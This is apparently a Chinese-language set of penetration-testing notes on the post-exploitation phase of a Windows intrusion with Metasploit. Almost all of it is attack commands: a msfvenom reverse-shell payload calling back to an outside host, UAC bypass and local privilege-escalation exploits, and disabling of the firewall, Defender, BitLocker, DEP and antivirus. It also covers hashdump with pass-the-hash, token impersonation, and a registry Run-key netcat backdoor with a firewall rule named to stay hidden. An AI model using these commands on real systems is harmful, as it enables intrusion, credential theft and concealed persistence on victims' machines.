后渗透阶段-提权、后门、域渗透

  • 已经获得目标系统控制权后扩大战果

    • 提权
    • 信息收集
    • 渗透内网
    • 永久后门
  • 基于已有session扩大战果

    • msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o 1.exe

关闭UAC、提权

  • load priv
  • getsystem
    • priv_elevate_getsystem:Operation failed:Access is denied.
  • 绕过UAC限制(当前session有效)
    • use exploit/windows/local/ask
    • use exploit/windows/local/bypassuac
    • use exploit/windows/local/bypassuac_injection
  • 利用漏洞直接提权为system
    • use exploit/windows/local/ms13_053_schlamperei
    • use exploit/windows/local/ppr_flatten_rec
  • 图形化界面
    • set payload windows/vncinject/reverse_tcp
    • set viewonly no
  • load priv->hashdump
  • psexec的pass the hash
    • use exploit/windows/smb/psexec
    • set smbpass hash
    • 需要提前关闭UAC(是关闭不是绕过)
      • 通过cmd执行注册表修改
  • 关闭windows防火墙
    • 需要成为管理员或system权限
    • netsh advfirewall set allprofiles state off
  • 关闭windowsDefender
    • net stop windefend
    • net stop 服务名称
  • Bitlocker 磁盘加密
    • manage-bde -off C:
    • manage-bde -status C:
  • 关闭DEP
    • bcdedit.exe /set{current}nx AlwaysOff
  • 杀死防病毒软件
    • killav
    • run post/windows/manage/killav
  • 开启远程桌面服务
    • run /post/windows/manage/enable_rdp
    • run getgui -e
      • run getgui -u user -p pass
  • 查看远程桌面
    • screenshot
    • use espia(load espia)->screengrab

域渗透

  • Tokens

    • 用户每次登陆,账号绑定临时的Token
    • 访问资源时提交Token进行身份验证,类似于Web Cookie
    • Delegate Token:交互登录会话(本地登录和远程登录,都是活动状态)
    • Impersonate Token:非交互登录会话(\\192.168.0.113 访问文件共享)
    • Delegate Token帐号注销后变为Impersonate Token,权限依然有效
  • Incognito

    • 独立功能的软件,被MSF集成在meterpreter中
    • 无需密码破解或获取密码hash,窃取token将自己伪装成其他用户
    • 尤其适用于域环境下提权渗透多操作系统
    • load incognito
      • list_token -u
      • impersonate_token LAB\administrator
      • execute -f cmd.exe -i -t
        • -t 使用当前token

通过注册表留后门

  • 注册表保存着windows几乎全部配置参数

    • 如果修改不当,可直接造成系统崩溃
    • 修改前完整备份注册表
    • 某些注册表的修改是不可逆的
  • 常见用途

    • 修改、增加启动项
    • 窃取存储与注册表中的机密信息
    • 绕过文件型病毒查杀
  • 用注册表添加NC后门服务(meterpreter)

    • upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
    • 查看启动项:reg enumkey -k HKLM\software\microsoft\windows\currentversion\run(这个路径是四个启动项路径之一)
    • 在其中增加一条键值:reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d “C:windows\\system32\nc.exe -Ldp 444 -e cmd.exe”
  • 添加防火墙规则

    • execute -f cmd -i -H
    • netsh firewall show opmode
    • netsh firewall add portopening TCP 4444 “test” ENABLE ALL(注意名字换隐蔽性强的)
    • shutdown -r -f -t 0
      • 需要关闭UAC,否则Access is denied.(5)
    • nc 1.1.1.1 4444
      • 中文乱码,shell下chcp 65001
  • 其它注册表项,google搜索registry quick find chart